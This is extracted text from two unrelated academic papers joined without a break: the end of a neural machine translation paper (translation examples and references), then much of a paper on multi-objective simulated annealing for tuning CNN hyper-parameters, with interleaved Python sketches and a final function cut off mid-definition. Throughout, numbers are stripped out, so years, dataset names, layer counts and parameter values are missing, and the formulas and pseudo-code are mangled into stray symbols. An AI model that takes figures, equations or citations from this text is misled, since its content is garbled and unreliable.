bush also said that at the invitation of pakistan and india , he will visit pakistan and india in march . 
ours bush also said that at the invitation of the pakistani and indian governments , he will visit pakistan and india in march . source 所以有不少人认为 说 , 如果是这样的话 , 对皇室、对日本的社会也是 会有很大的影响的。 reference therefore , many people say that it will have a great impact on the royal family and japanese society . base therefore , many people are of the view that if this is the case , it will also have a great impact on the people of hong kong and the japanese society . coverage therefore , many people think that if this is the case , there will be great impact on the royal and japanese society . ours therefore , many people think that if this is the case , it will have a great impact on the royal and japanese society . table : comparison on translation examples. we italicize some translation errors and highlight the correct ones in bold. cantly improves translation performances across dif- ferent language pairs. with better modeling of past and future translations, our approach performs much better than the standard attention-based nmt, re- ducing the errors of under and over translations. acknowledgement we would like to thank the anonymous reviewers as well as the action editor, philipp koehn, for in- sightful comments and suggestions. shujian huang is the corresponding author. this work is sup- ported by the national science foundation of china (no. , ), the jiangsu provin- cial research foundation for basic research (no. bk ). references jimmy ba, geoffrey hinton, volodymyr mnih, joel z leibo, and catalin ionescu. . using fast weights to attend to the recent past. in nips . dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in iclr . dzmitry bahdanau, philemon brakel, kelvin xu, anirudh goyal, ryan lowe, joelle pineau, aaron courville, and yoshua bengio. . an actor-critic algorithm for sequence prediction. in iclr . ondřej bojar, christian buck, rajen chatterjee, chris- tian federmann, yvette graham, barry haddow, matthias huck, antonio jimeno yepes, philipp koehn, and julia kreutzer. . proceedings of the second conference on machine translation. in proceedings of the second conference on machine translation. asso- ciation for computational linguistics. denny britz, anna goldie, minh-thang luong, and quoc le. . massive exploration of neural ma- chine translation architectures. in emnlp . kyunghyun cho, bart van merrienboer, caglar gulcehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase represen- tations using rnn encoder–decoder for statistical ma- chine translation. in emnlp . michael denkowski and graham neubig. . stronger baselines for trustable results in neural ma- chine translation. in proceedings of the first work- shop on neural machine translation. carlos escolano, marta r. costa-jussà, and josé a. r. fonollosa. . the talp-upc neural machine translation system for german/finnish-english using the inverse direction model in rescoring. in proceed- ings of the second conference on machine transla- tion, volume : shared task papers. alex graves, greg wayne, and ivo danihelka. . neural turing machines. arxiv: . . caglar gulcehre, sarath chandar, kyunghyun cho, and yoshua bengio. . dynamic neural tur- ing machine with soft and hard addressing schemes. arxiv: . . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation. nal kalchbrenner and phil blunsom. . recurrent continuous translation models. in emnlp . diederik p. kingma and jimmy ba. . 
adam: a method for stochastic optimization. iclr . jiwei li, will monroe, and daniel jurafsky. . learning to decode for future success. arxiv: . . yang liu and maosong sun. . contrastive unsu- pervised word alignment with non-local features. in aaai . thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in emnlp . fandong meng, zhengdong lu, hang li, and qun liu. . interactive attention for neural machine transla- tion. in coling . haitao mi, baskaran sankaran, zhiguo wang, and abe ittycheriah. . coverage embedding models for neural machine translation. emnlp . tomas mikolov, greg corrado, kai chen, and jeffrey dean. . efficient estimation of word represen- tations in vector space. iclr . alexander miller, adam fisch, jesse dodge, amir- hossein karimi, antoine bordes, and jason weston. . key-value memory networks for directly read- ing documents. in emnlp . franz josef och and hermann ney. . a systematic comparison of various statistical alignment models. computational linguistics. kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic eval- uation of machine translation. in acl . ofir press and lior wolf. . using the output embed- ding to improve language models. in eacl . scott reed and nando de freitas. . neural programmer-interpreters. computer science. matı̄ss rikters, chantal amrhein, maksym del, and mark fishel. . c- ma: tartu-riga-zurich trans- lation systems for wmt . tim rocktäschel, johannes welbl, and sebastian riedel. . frustratingly short attention spans in neural lan- guage modeling. in iclr . mike schuster and kuldip k. paliwal. . bidirec- tional recurrent neural networks. ieee transactions on signal processing. rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. computer science. rico sennrich, alexandra birch, anna currey, ulrich germann, barry haddow, kenneth heafield, an- tonio valerio miceli barone, and philip williams. a. the university of edinburgh’s neural mt sys- tems for wmt . in proceedings of the second con- ference on machine translation, volume : shared task papers in acl. rico sennrich, orhan firat, kyunghyun cho, alexan- dra birch, barry haddow, julian hitschler, marcin junczys-dowmunt, samuel läubli, antonio valerio miceli barone, jozef mokry, and maria nadejde. b. nematus: a toolkit for neural machine trans- lation. in eacl . shiqi shen, yong cheng, zhongjun he, wei he, hua wu, maosong sun, and yang liu. . minimum risk training for neural machine translation. in acl . sainbayar sukhbaatar, arthur szlam, jason weston, and rob fergus. . end-to-end memory networks. in nips . ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in nips . zhaopeng tu, zhengdong lu, yang liu, xiaohua liu, and hang li. . modeling coverage for neural machine translation. in acl . zhaopeng tu, yang liu, zhengdong lu, xiaohua liu, and hang li. a. context gates for neural ma- chine translation. transactions of the association for computational linguistics. zhaopeng tu, yang liu, lifeng shang, xiaohua liu, and hang li. b. neural machine translation with re- construction. in aaai . mingxuan wang, zhengdong lu, hang li, and qun liu. . memory-enhanced decoder for neural machine translation. in emnlp . xing wang, zhengdong lu, zhaopeng tu, hang li, deyi xiong, and min zhang. . neural machine trans- lation advised by statistical machine translation. in aaai . 
longyue wang, zhaopeng tu, shuming shi, tong zhang, yvette graham, and qun liu. . trans- lating pro-drop languages with reconstruction models. in aaai . rongxiang weng, shujian huang, zaixiang zheng, xin- yu dai, and jiajun chen. . neural machine trans- lation with word predictions. in emnlp . yonghui wu, mike schuster, zhifeng chen, quoc v. le, mohammad norouzi, wolfgang macherey, maxim krikun, yuan cao, qin gao, klaus macherey, et al. . google’s neural machine translation system: bridging the gap between human and machine trans- lation. arxiv: . . multi-objective simulated annealing for hyper-parameter optimization in convolutional neural networks multi-objective simulated annealing for hyper-parameter optimization in convolutional neural networks ayla gülcü and zeki kuş computer science, fatih sultan mehmet university, istanbul, turkey abstract in this study, we model a cnn hyper-parameter optimization problem as a bi-criteria optimization problem, where the first objective being the classification accuracy and the second objective being the computational complexity which is measured in terms of the number of floating point operations. for this bi-criteria optimization problem, we develop a multi-objective simulated annealing (mosa) algorithm for obtaining high-quality solutions in terms of both objectives. cifar- is selected as the benchmark dataset, and the mosa trade-off fronts obtained for this dataset are compared to the fronts generated by a single-objective simulated annealing (sa) algorithm with respect to several front evaluation metrics such as generational distance, spacing and spread. the comparison results suggest that the mosa algorithm is able to search the objective space more effectively than the sa method. for each of these methods, some front solutions are selected for longer training in order to see their actual performance on the original test set. again, the results state that the mosa performs better than the sa under multi-objective setting. the performance of the mosa configurations are also compared to other search generated and human designed state-of-the-art architectures. it is shown that the network configurations generated by the mosa are not dominated by those architectures, and the proposed method can be of great use when the computational complexity is as important as the test accuracy. subjects artificial intelligence, computer vision keywords multi-objective, simulated annealing, convolutional neural networks, hyper-parameter optimization introduction convolutional neural networks (cnns) differ from multi-layer perceptron models with the use of convolution operators instead of matrix multiplications in at least one of its layers (lecun et al., ; lecun et al., ; goodfellow, bengio & courville, ). excellent results obtained for object classification problems in ilsvrc (imagenet large scale vision recognition competition) accelerated the use of these networks in other vision related problems like face and activity recognition (russakovsky et al., ). with the availability of increasing computational resources, winning architectures of the competition, aka state-of-the-art models, became deeper and deeper resulting in very high classification accuracy rates. in , ilsvrc winner model, vggnet (simonyan & zisserman, ), had layers, but the following years’ state-of-the-art models, for example, resnet (he et al., ) and densenet (huang et al., ) had over layers. how to cite this article gülcü a, kuş z. . 
multi-objective simulated annealing for hyper-parameter optimization in convolutional neural networks. peerj comput. sci. :e doi . /peerj-cs. submitted june accepted november published january corresponding author ayla gülcü, agulcu@fsm.edu.tr academic editor andrea schaerf additional information and declarations can be found on page doi . /peerj-cs. copyright gülcü and kuş distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:agulcu@�fsm.�edu.�tr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ finding a cnn architecture that generates high quality results for a given problem is a challenging process which requires a systematic approach rather than by trial and error. moreover, trying all possible parameter combinations is infeasible due to the size of the parameter space. the problem of automatically designing cnn architectures and selecting the best set of hyper-parameters for the network has drawn attention of many researchers over many years. it is shown in many studies that using algorithmic approaches rather than manual tuning process results in simpler networks with improved classification performance (bergstra & bengio, ; real et al., ; ma et al., ). this automated neural architecture search (nas) and hyper-parameter optimization is not only limited to cnns, but also applicable for both feed-forward and recurrent neural networks (rnns). for example, the architectures and the hyper-parameters of long short-term memory networks which are the most widely-used variants of rnns can be optimized with the proposed approaches. hyper-parameter optimization (hpo) is the most basic task in automated machine learning (automl) which reduces the human effort by automatizing the labor intensive hyper-parameter tuning process. with hpo, a wider solution space can be searched, which in turn may yield in better performing configurations for the problem at hand (for a detailed view on hpo, please refer to feurer & hutter, ). on the other hand, nas is a specialized hyper-parameter optimization problem which involves discrete hyper-parameters as in hpo, but with an additional structure that can be captured with a directed acyclic graph (dag) (li & talwalkar, ). in nas methods, the search space for designing an entire architecture contains too many nodes and edges; therefore it is usually defined over smaller building blocks called cells which drastically reduce the search space. a new architecture is then built by stacking these cells in a predefined manner. the number of the cells and the types of those cells along with the types of connections allowed among those cells are among important design decisions in nas studies (elsken, metzen & hutter, ). random search (rs) (bergstra & bengio, ), bayesian optimization (bo) approaches (hoffman & shahriari, ) and population-based optimization algorithms such as genetic algorithms (gas) (holland, ), evolutionary algorithms (eas) (back, ) and particle swarm optimization (pso) (eberhart & kennedy, ) have been successfully used to select the best cnn hyper-parameters. especially, eas are among the most widely used techniques for hpo. 
in (real et al., ; suganuma, shirakawa & nagao, ; elsken, metzen & hutter, ) eas have been used for optimizing the network architecture and gradient-based methods have been used for optimizing the network weights. single-stage algorithms like simulated annealing (sa) and its variants have also proven to be effective for cnn hpo problems (gülcü & kuş, ). nas has become a very important research topic especially after it has obtained competitive performance on the cifar- and penn treebank benchmarks with a search strategy based on reinforcement learning (zoph & le, ). however, the computational cost of this approach led the researchers to seek other methods with less computational requirement but with higher classification performance. relaxation-based methods (liu, simonyan & yang, ) try to improve the computational efficiency of gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nas approaches, but these approaches still require huge computational resources. eas provide a good alternative for nas, but they still suffer from the large computational requirement (liu et al., ). on the other hand, it is shown that ea-based nas methods that use limited search budgets result in poor classification performance (xie & yuille, ; sun et al., a). therefore, recent hpo and nas approaches not only consider the error rate, but also the complexity brought by the proposed configuration or architecture. a single-objective optimization problem involves a single objective function, and usually results in a single solution. however, in many real-life problems, there are multiple objectives to be considered, and these objectives usually conflict with each other. optimizing a solution with respect to one objective often results in unacceptable results with respect to the other objectives. for example, achieving a network with a low error rate usually comes with a huge cost of computational complexity. thus, a perfect multi- objective solution that simultaneously optimizes each objective function is almost impossible. a minimization multi-objective optimization problem with k objectives is defined as follows (konak, coit & smith, ): given an n-dimensional decision variable vector x ¼ x ;::;xnf g in the solution space x , find a vector x� that minimizes a given set of k objective functions z x�ð Þ¼ z x�ð Þ;::;zk x�ð Þf g. the solution space x is generally restricted by a series of constraints and bounds on the decision variables. there are two general solution approaches to multi-objective optimization (moo). one is to combine all of the objective functions into a single composite function using methods like weighted sum method, but in practice it is very difficult to select the proper weights that will reflect the decision maker’s preferences. the second approach is to provide the decision maker a set of solutions that are non-dominated with respect to each other from which she/he can choose one. a reasonable solution to a multi-objective problem is to find a set of solutions, each of which satisfies the objectives at an acceptable level without being dominated by any other solution. a feasible solution x is said to dominate another feasible solution y; x � y, if and only if, zi xð Þzi yð Þ for i ¼ ;::;k and zj xð Þ < zj yð Þ for at least one objective function j. a solution is said to be pareto optimal if it is not dominated by any other solution in the solution space. 
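the dominance definition above reads directly as a small predicate over objective vectors (both objectives minimized). the sketch below is illustrative python, not code from the paper:

def dominates(z_x, z_y):
    # x dominates y: no worse in every objective, strictly better in at least one
    return all(a <= b for a, b in zip(z_x, z_y)) and any(a < b for a, b in zip(z_x, z_y))

# toy objective vectors: (computational cost, error rate)
print(dominates((120.0, 0.08), (150.0, 0.10)))   # True: better in both objectives
print(dominates((120.0, 0.12), (150.0, 0.10)))   # False: a trade-off, neither dominates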
improving a pareto optimal solution with respect to one objective is impossible without worsening at least one of the other objectives. the set of all feasible non-dominated solutions in the solution space is referred to as the pareto-optimal set, and for a given pareto-optimal set, the corresponding objective function values in the objective space are called the pareto- front. in multi-objective optimization, there are two tasks to be completed, where the first task being the optimization task for finding the pareto-optimal set, and the second task being a decision making task for choosing a single most preferred solution from that set which involves a human interaction. generating the pareto-optimal set is often infeasible, and the methods like evolutionary algorithms (eas) usually do not guarantee to identify the optimal front, but try to provide a good approximation; that is, a set of solutions whose objective vectors are not too far away from the optimal objective vectors. since the pareto-optimal set is unknown, comparing the approximations generated by gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ different methods is a difficult task requiring appropriate quality measures to be used. there are several measures in the literature each of which reflects a different aspect of the quality such as the closeness to the optimal front and the diversity of the solutions in the front (please refer to zitzler et al., for a detailed review on moo performance assessment). multi-objective ea-based approaches are among the most widely-used methods for cnn moo problems. in these studies, high classification performance is considered as the first objective, and the low computational requirement is considered as the second objective. it is aimed to generate networks that are satisfactory with respect to both of these objectives. (kim et al., ) try to optimize the deep neural networks in terms of two competing objectives, speed and accuracy using gas. in their study, lenet (lecun et al., ) is chosen as the initial architecture, and the performance of the initial solution is improved considering two objectives. test results based on the mnist (lecun et al., ), cifar- (krizhevsky & hinton, ) and drowsiness recognition (weng, lai & lai, ) show that the proposed approach yields in models with better accuracy and speed than the initial model. in elsken, metzen & hutter ( ), lamarckian evolution and multi-objective ea is used to generate computationally efficient cnns with high classification accuracy values. based on the results on cifar- dataset, the proposed approach achieves competitive results with other multi-objective approaches. lu et al. ( a) present another multi-objective ea which they call nsganet that try to optimize both error rate and the number of floating point operations (flops). according to the test results obtained using cifar- , cifar- and human chest x-rays data sets, the proposed approach increase the search efficiency. same objectives are also adopted in the study of wang et al. ( ) in which pso is used to fine tune the hyper-parameters. in the study, best models are compared to densenet- in terms of both objectives. the results based on cifar- dataset state that the models generated by the proposed approach dominate the base model. 
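returning to the dominance relation sketched earlier, the non-dominated (approximate pareto) front of any finite set of evaluated configurations, which is the object all of the studies above compare, can be extracted with a simple filter. an illustrative sketch with made-up objective values:

def dominates(z_x, z_y):
    return all(a <= b for a, b in zip(z_x, z_y)) and any(a < b for a, b in zip(z_x, z_y))

def non_dominated(points):
    # keep every point that no other evaluated point dominates
    return [p for p in points
            if not any(dominates(q, p) for q in points if q is not p)]

evaluated = [(300.0, 0.07), (120.0, 0.12), (150.0, 0.10), (400.0, 0.07), (120.0, 0.15)]
print(non_dominated(evaluated))   # [(300.0, 0.07), (120.0, 0.12), (150.0, 0.10)]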
in this study, we present a single-stage hpo method to optimize the hyper-parameters of cnns for object recognition problems considering two competing objectives, classification accuracy and the computational complexity which is best measured in terms of flops. for this bi-criteria optimization problem, we use a multi-objective simulated annealing (mosa) algorithm with the aim of generating high quality fronts. cifar- dataset is selected as the benchmark, and the final fronts generated by the proposed algorithm is compared to the fronts generated by a single-objective variant of the same algorithm with respect to several front metrics such as generational distance, spacing and spread. according to the results obtained using these front evaluation metrics, it can be concluded that the mosa algorithm is able to search the objective space more effectively than the sa method. after performing longer training on the selected configurations, the results again reveal that the mosa performs better than the sa under multi-objective setting. the mosa configurations are also compared to human engineered and search generated configurations. when both test accuracy and the complexity are taken into account, it is shown that the network configurations generated by the mosa are gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ not dominated by those configurations, and the proposed method can be of great use when the computational complexity is as important as the test accuracy. materials and methods in “cnns—an overview”, we remind key concepts of cnns and multi-objective aspects of cnns. in “sa algorithm”, we first describe a single-objective sa algorithm, and then in “mosa algorithm”, we give some details about the mosa algorithm that discriminate it from the sa such as the acceptance criterion and the archive maintenance mechanism. in “performance evaluation criteria” we elaborate the performance evaluation metrics used in this study to compare different pareto fronts in a quantitative manner. cnns—an overview neural networks (nns) receive an input and transform it through a series of hidden layers each of which is made up of a set of neurons that receives some inputs, performs a dot product followed with a non-linearity. in any layer, each neuron is fully connected to all neurons in the previous layer, that is why regular nns don’t scale well to inputs in the form of images. similarly, cnns are made up of neurons that have learnable weights and biases, and the whole network still expresses a single differentiable score function. in general, cnns assume that the inputs are images, and they constrain the architecture in a more sensible way. there are three types of layers in cnns: convolution layer, pooling layer and fully connected layer. a convolution layer is a fundamental component of a cnn architecture that performs feature extraction through a combination of linear and nonlinear operations, that is, convolution operation and activation function. convolution is specialized type of linear operation used for feature extraction with the help of a small array of numbers called filter or kernel navigating over the input tensor. at each location of the input tensor, an element-wise product between the elements of the filter and the input is applied. these products are then summed to obtain the output value in the corresponding position of the output tensor which is called a feature map. 
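the element-wise multiply-and-sum just described can be written down directly; the short numpy sketch below computes one feature map for a single-channel input with one filter, stride 1 and no padding (toy sizes, illustrative only):

import numpy as np

def conv2d_single(image, kernel):
    # slide the kernel over the image; at each position take the element-wise
    # product with the underlying patch and sum it to get one output value
    ih, iw = image.shape
    kh, kw = kernel.shape
    out = np.zeros((ih - kh + 1, iw - kw + 1))
    for i in range(out.shape[0]):
        for j in range(out.shape[1]):
            out[i, j] = np.sum(image[i:i + kh, j:j + kw] * kernel)
    return out

image = np.arange(25, dtype=float).reshape(5, 5)   # toy 5x5 single-channel "image"
kernel = np.ones((3, 3)) / 9.0                     # toy 3x3 averaging filter
print(conv2d_single(image, kernel))                # 3x3 feature map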
this operation is repeated using multiple kernels resulting in multiple number of feature maps at a single layer. figure illustrates a cnn with two convolution layers each of which contains different number of filters with differing size. in the figure, images of size × × are fed into the cnn where the first two dimensions denote the width and height of the image, and the third dimension denotes the number of channels which is for a color image. as can be seen in fig. which illustrates the convolution process, the number of channels (depth) of the filters always equals to the number of channels of the input image, but the size and the number of those filters are among the hyper-parameters whose values should be selected carefully. the convolution process can be speed up by using dimension reduction adjusting the stride value. if the stride value takes a value other than , then the filter skips the input by this amount. if input size reduction is not desired, padding is used. in the pooling layer, size reduction is done in the same way as in the convolution layer with one difference is that the number of channels remains unchanged. there are two main types of gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pooling methods: max and average pooling. pooling type, the size and the stride of the filter are among the hyper-parameters in a given network. in the example cnn in fig. , the first convolution layer includes filters each with a size of × × , and after the first convolution operation, linear structure is transformed into a non-linear structure using relu activation function. after the pooling layer, input weight and height is reduced to × , but the depth is increased to . after the second convolution and pooling operations, input width and height is reduced even more. strive method is proposed as an alternative to the pooling method (springenberg et al., ). a strive layer is a kind of convolution layer with × or × filter sizes with a stride of . filters in this layer do not have weights to learn, because, only size reduction is applied. after the convolution and pooling operations, a flattening operation is applied to transform all the feature maps in the final layer into a one-dimensional vector which is then fed to the fully connected figure an example cnn architecture. full-size doi: . /peerj-cs. /fig- figure convolution process. full-size doi: . /peerj-cs. /fig- gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ layer where classification results are obtained. there might be multiple fully connected layers in a cnn; however, the output size of the last fully connected layer should match the number of classes in the problem. for a given input, a classification score is computed for each class and the input is assigned to the class with the highest score. based on the prediction accuracy, an error is computed which is then used to update the weights in the network. this process is repeated until a desired error rate is achieved. for a detailed review on the topic please refer to (goodfellow, bengio & courville, ). hyper-parameters like the total number of layers, the number and size of the filters at each layer along with filter related parameters like stride and padding define a cnn configuration or an architecture. 
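the effect of filter size, stride and padding on the spatial dimensions can be checked with the usual output-size arithmetic; a small helper, assuming square inputs and filters (illustrative, not from the paper):

def conv_output_size(in_size, kernel, stride=1, padding=0):
    # standard formula: floor((W - K + 2P) / S) + 1
    return (in_size - kernel + 2 * padding) // stride + 1

# "same" padding with a 3x3 filter and stride 1 keeps a 32x32 input at 32x32
print(conv_output_size(32, kernel=3, stride=1, padding=1))   # 32
# a 2x2 pooling (or strive) step with stride 2 halves the spatial size
print(conv_output_size(32, kernel=2, stride=2, padding=0))   # 16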
on the other hand, total number of weights in all of the layers of a cnn defines the size or the number of parameters of that network. the size of a cnn is calculated differently for convolution and fully connected layers. the number of parameters in a convolution layer equals to d �m�nð Þþ ð Þ�k , where d is the number of input feature maps, and m and n are the filter width and height, respectively ( is added because of the bias term for each filter), and k is the number of output feature maps. the number of parameters in a fully connected equals to cþ ð Þ�p, where c is the number of input nodes and p is the number of output nodes. sa algorithm simulated annealing (sa) uses an adaptation of the metropolis algorithm to accept non-improving moves based on a probability (kirkpatrick, gelatt & vecchi, ). in a single-objective sa, a new solution, x′, is selected within the neighborhood of current solution x, where the neighborhood of x is defined as all the solutions that can be reached by a single move from x. the moves that can be performed in a sa are defined based on the representation used to encode a feasible solution. solution representation, on the other hand, is highly dependent on the problem domain. if the objective function value of x′ is smaller than x (for a minimization problem), then x′ is accepted. if x′ is worse than x, then it is accepted with a probability, pacc,which is calculated based on the worsening amount and the current temperature of the system as, pacc ¼ min ; exp �df=tcurð Þf g where df is the worsening amount in the objective function and tcur is the current temperature. if the temperature is high, then the probability of accepting a worsening move would be higher than the probability with a lower temperature. in general, the system is initiated with a high temperature to allow exploration during initial steps. as shown in the sa pseudo-code below, after a certain number of solutions are visited at the current temperature level which is defined by the parameter nbr inner iter, the temperature is lowered gradually according to a predefined annealing scheme. geometric cooling that uses a decay factor smaller than is the most widely used cooling scheme in sa. at each outer iteration, tcur is reduced to ensure the convergence of the algorithm, because the probability of accepting worsening moves drops as tcur reduces. the total number of solutions visited during a run of a sa is defined as nbr out iter �nbr inner iter. however, the number of outer iterations is not always fixed before the start of the algorithm. a minimum temperature level, or a minimum objective function value can be defined as the stopping criterion. initial gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ temperature, tinit, cooling rate (if geometric cooling is employed) and the final temperature, tfinal are important parameters that should be selected carefully. in this study, the sa algorithm considers only one objective which is the error rate, and it accepts a new solution x′ only if it is better than current solution x with respect to this single objective value. however, if x and x′ have the same error rate, then the sa selects the one with the smaller number of flops. the composite move used to generate x′ is defined in “local moves”. in order to define tinit, we use a real time initial temperature selection strategy (smith, everson & fieldsend, ). 
in this strategy, pacc is not calculated using the formula pacc ¼ min ; exp �df=tcurð Þf g. instead, a fixed initial probability value which is recommended as . is defined for accepting the worsening moves. then, tinit is calculated as � dfave= ln paccð Þð Þð Þ, where dfave is the average worsening penalty amount which is calculated executing a short “burn-in” period. a similar real time temperature adjustment approach is also used to define tfinal. in this study, the total iteration budget defines the sa stopping criterion, and the number of inner and outer iterations are defined according to this iteration budget and the cooling scheme. mosa algorithm there are many types of mosa algorithms in the literature, and basically, there are two main differences between multi-objective and single-objective sa algorithms. the first difference is the design of the acceptance rule, and second one is the maintenance of an external archive of non-dominated solutions which will eventually yield an approximation of the pareto front. let zk xð Þ for k ; ; ::; kf g be the value of the kth objective function of a solution x. if a new solution x yields in objective function values that are superior to x in terms of all of the objectives; that is, dzk ¼ zk x ð Þ� zk xð Þ algorithm sa init sa params tinit; nbr out iter; nbr inner iterð Þ tcur tinit for counter to nbr out iter do for inner counter to nbr inner iter do x selectfromneighbor xð Þ if df ¼ f x ð Þ�f xð Þð Þ� then x x else if prnd � exp �df=tcurð Þthen x x else continue with x end end tcur tcur�cool ratio end gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and dzk � ; k ; f g assuming the two objectives are to be minimized, then it is always accepted. otherwise, probabilistic acceptance rules as discussed in “sa algorithm”. are used, but before this, multiple objective values should be combined into a single objective value. there are several approaches to combine all objective function values into a single value. (ulungu et al., ) use a criterion scalarizing function which takes the weighted sum of the objective functions. czyzżak & jaszkiewicz ( ) use a diversified set of weights to obtain a diverse set of solutions in the final front in their sa-based algorithm which they call pareto simulated annealing (psa). suppapitnarm et al. ( ) propose another mosa, which they call smosa that suggests maintaining different temperatures, one for each objective. in the study a “return-to-base” strategy which restarts the search from a random archive solution is introduced. in dominance-based acceptance rules, x and x are compared with respect to the dominance relation. x is said to dominate x which is denoted as x � x ,if it is better than x in at least one objective and it is not worse than x in all of the other objectives. if at any iteration, x � x then, x is accepted with a probability which is also computed according to the domination status of the solutions. 
suman ( ) proposes a pareto domination-based mosa which uses the algorithm mosa init mosa params tinit; nbr out iter; nbr inner iterð Þ tcur tinit for counter to nbr out iter do for inner counter to nbr inner iter do x selectfromneighbor xð Þ if x � x // current dominates new then if prnd � exp �df=tcurð Þthen x x else if x � a; a a then // an archive solution is dominated by new x x updatearchive x ð Þ elseif a � x ; a a then == an archive solution dominates new a� selectrandomarchivesolutionðÞ x select a�; x ; xð Þ == ða � and x Þ or ða� and xÞ competes else ==new does not dominate or is not dominated by any archive solution x x updatearchive x ð Þ end end tcur tcur�cool ratio end gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ current domination status of a solution to compute its acceptance probability. the acceptance probability of a solution is determined by the number of solutions in the current front dominating it. bandyopadhyay et al. ( ) proposes archive-based multi-objective simulated annealing (amosa) which again uses a dominance-based acceptance rule. a detailed survey on single-objective and multi-objective sa can be found in suman & kumar ( ). the mosa algorithm proposed in this study iterates in a similar fashion as the single-objective sa algorithm. however, there are now two objective values to take into consideration while moving from x to x , where the first objective being the number of flops required by the network, and the second being the error rate achieved by the network. criterion scalarizing rules can be used to combine the two objective values into one, but this method requires both objective values to be in the same scale and proper weights to be defined for each objective. on the other hand, probability scalarizing rules calculate the acceptance probability of x for each objective individually, then a decision rule is applied to aggregate these probabilities such as taking the minimum, maximum or the product of these probabilities. as different probabilities are evaluated for each objective, a different temperature should be maintained for each objective in this approach. due to the difficulties mentioned above, we adopt the smith’s pareto dominance rule (smith et al., ) in our mosa algorithm. starting from the first iteration, all non-dominated solutions encountered during the search are collected in an external archive, a, which is updated whenever a new solution is accepted. the state of a is expected to improve as the algorithm iterates, and archive solutions in the final iteration form the pareto front which is presented to the decision maker. as shown in the mosa pseudo-code below, as the algorithm iterates from x to x , if x � x (x dominates x ), then x is accepted based on smith’s pareto dominance rule which calculates the acceptance probability of a given solution by comparing it with the current archive which contains potentially pareto-optimal set of solutions. smith’s rule uses a difference in the energy level, df, to compare two solutions with respect to all objectives as follows: let a denote the current potentially pareto optimal set and ~a denote the union of this set and two competing solutions, ~a ¼ a[x [x , then df ¼f = ~a �� ��g � f x ð Þj j� f xð Þj jf g, where f xð Þ denotes the solutions in a that dominate x plus . 
the probability of accepting x is then computed as pacc ¼ exp �df=tcurð Þ, where the only difference with a single-objective version is the calculation of df. in this approach, only one temperature is maintained regardless of the number of objectives. in a multi-objective version of sa algorithm, archive maintenance related rules should also be defined. if x �x (x does not dominate x ), then x becomes a candidate for being a member of the archive. this is determined as follows: if x dominates any solution in a, then x is accepted and the archive is updated by inserting x and removing all the solutions dominated by it. if x �x but there is a solution a a dominating x , then no archive update is performed and the current iteration is completed either by accepting x , a or x as the current solution. if x � x, then a and x compete for being selected as the current solution according to the probability calculated with the same rule described above. here, a represents a random gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ archive solution dominating x . continuing the search process with a previously visited archive solution is known as return-to-base strategy. if x �x and x �x, then first these two solutions compete, and then the winning solution competes with a according to the same probabilistic acceptance rule. if x �x and there is no solution a a that dominates x , and x does not dominate any solution a a, then x is accepted and inserted into the archive. as the archive is updated by removing all dominated solutions, the size of the archive does not grow very large. selection of other mosa parameters such as tinit, tfinal, cooling rate and also the number of inner and outer iterations are given in detail in section “mosa parameter tuning”. performance evaluation criteria in multi-objective optimization problems, final fronts are evaluated according to two performance criteria: (i) closeness to the pareto-optimal front and, (ii) diversity of the solutions along the front (zitzler, deb & thiele, ; deb, ). generational distance (gd) is the most-widely used metric to examine the closeness of the final front to pareto-optimal front (van veldhuizen & lamont, ). in order to measure the diversity which is comprised of two components, namely distribution and spread, two metrics, spacing and maximum spread are used. spacing evaluates the relative distance among the solutions, whereas spread evaluates the range of the objective function values. gd metric requires a pareto-optimal front in order to compare any two fronts. since this optimal front is not known in advance, it is approximated by an aggregate front, a�, which is formed by combining all solutions in the two fronts. then, the amount of improvement achieved in each front is measured with respect to this aggregate front. gd for a given front is calculated as given in eq. ( ), where di is the euclidean distance between the solution i a and the closest solution k a�. in eq. ( ), pmax and emax denote the maximum objective values, whereas p� and e� denote the minimum objective function values observed in a�. for this gd metric, smaller the better. 
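the generational distance and spread metrics described above can also be stated in code; the sketch below follows the normalized euclidean distances in the text, with toy (flops, error-rate) fronts standing in for the compared and aggregate fronts (illustrative only):

import math

def normalize(point, bounds):
    (p_min, p_max), (e_min, e_max) = bounds
    p, e = point
    return (p - p_min) / (p_max - p_min), (e - e_min) / (e_max - e_min)

def objective_bounds(points):
    ps = [p for p, _ in points]
    es = [e for _, e in points]
    return (min(ps), max(ps)), (min(es), max(es))

def generational_distance(front, reference):
    # root of the summed squared distances to the closest reference point, over the front size
    bounds = objective_bounds(reference)
    dists = [min(math.dist(normalize(a, bounds), normalize(r, bounds))
                 for r in reference) for a in front]
    return math.sqrt(sum(d * d for d in dists)) / len(front)

def spread(front, reference):
    # normalized extent of the front in each objective
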